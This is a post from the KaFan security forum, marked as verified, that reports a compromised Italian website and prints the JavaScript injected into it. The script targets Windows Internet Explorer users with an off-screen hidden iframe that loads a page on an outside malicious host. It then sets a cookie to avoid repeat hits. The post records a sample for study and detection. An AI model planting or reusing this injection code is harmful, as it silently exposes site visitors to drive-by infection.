查看: 1066|回复: 0
收起左侧

[已鉴定] http://www.adarredaredecorare.it/

[复制链接]
哀酱俏佳人
发表于 2013-11-30 17:20:25 | 显示全部楼层 |阅读模式
  1. function gra(a, b){
  2.   return Math.floor(Math.random() * (b - a + 1)) + a;
  3. }
  4. function rs(){
  5.   return Math.random().toString(36).substring(5);
  6. }
  7. if (navigator.cookieEnabled){
  8.   var stnm = rs();
  9.   var ua = navigator.userAgent;
  10.   if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
  11.     document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) +
  12.     'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm +
  13.     '"><iframe src="http://fjetclwwnll.myfw.us/ad/feed.php" width="' + gra(300, 600) +
  14.     '" height="' + gra(300, 600) + '"></iframe></div>');
  15.     var exp = new Date();
  16.     exp.setDate(exp.getDate() + 7);
  17.     document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
  18.   }
  19. }
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 15:05 , Processed in 0.117270 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表